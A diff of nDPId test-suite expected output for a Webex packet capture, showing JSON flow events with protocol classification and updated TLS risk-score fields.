+01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570637191,"flow_last_seen":1444570733113,"flow_idle_time":180000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":14432,"flow_avg_l4_payload_len":656,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640298,"flow_last_seen":1444570645704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00731{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570675941,"flow_last_seen":1444570690940,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570694561,"flow_last_seen":1444570709697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00730{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00567{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
 00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636151,"flow_last_seen":1444570638237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640284,"flow_last_seen":1444570645701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.213.212","src_port":41757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","ndpi": {"proto":"Webex","breed":"Acceptable","category":"VoIP"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Webex","breed":"Acceptable","category":"VoIP"}}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1444570718801,"flow_last_seen":1444570739041,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51772,"dst_port":9000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570631058,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00728{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00593{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636255,"flow_last_seen":1444570639258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2920,"flow_tot_l4_payload_len":7052,"flow_avg_l4_payload_len":414,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.4.76","src_port":52730,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
+00629{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1444570640346,"flow_last_seen":1444570640407,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":4,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)","8":"Weak TLS cipher"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
-00591{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636248,"flow_last_seen":1444570639255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.104.140","src_port":44492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}}
